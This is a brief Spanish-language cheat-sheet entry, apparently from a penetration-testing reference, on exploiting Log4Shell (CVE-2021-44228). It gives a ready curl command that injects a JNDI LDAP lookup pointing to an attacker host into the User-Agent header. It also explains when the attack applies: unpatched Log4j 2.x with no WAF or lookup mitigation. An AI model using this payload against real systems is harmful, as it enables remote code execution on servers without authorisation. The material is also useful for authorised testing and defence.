log4j JNDI (CVE-2021-44228)
curl -H 'User-Agent: ${jndi:ldap://<attacker>/a}' <url>
Explotación de la vulnerabilidad Log4Shell mediante inyección JNDI en cabeceras HTTP o parámetros.
Cuando sospechas que una aplicación usa Log4j 2.x y no está parcheada. Log4Shell permite ejecución remota de código (RCE) mediante la inyección de un string JNDI en una cabecera (User-Agent, X-Forwarded-For, etc.) o parámetro. Es una de las vulnerabilidades más críticas de la historia.
Si la aplicación no usa Log4j o está actualizada. También si el objetivo tiene un WAF que bloquea el patrón ${jndi:...} o utiliza `log4j2.formatMsgNoLookups=true`.